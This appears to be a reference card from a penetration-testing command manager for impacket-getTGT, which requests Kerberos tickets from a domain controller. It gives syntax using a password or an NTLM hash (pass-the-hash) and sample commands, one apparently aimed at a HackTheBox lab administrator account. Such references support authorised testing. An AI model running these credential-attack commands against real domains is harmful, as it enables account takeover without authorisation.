Impacket Get TGT

Get TGT to be used in Kerberos authentication

Tool
impacket-getTGT
Category
Credential Attacks / Kerberoasting
Platform
linux
Requires
password
Protocols
KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-getTGT '<domain>/<user>:<password>' -dc-ip <ip>; export KRB5CCNAME='<user>.ccache'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-getTGT -hashes ':<hash>' '<domain>/<user>' -dc-ip <ip>; export KRB5CCNAME='<user>.ccache'

Examples

impacket-getTGT 'CORP.LOCAL/user:password' -dc-ip 192.168.1.100; export KRB5CCNAME='user.ccache'
impacket-getTGT -hashes ':e656e07c56d831611b577b160b259ad2' voleur.htb/administrator -dc-ip 10.10.11.76

Tags

impacket tgt kerberos ticket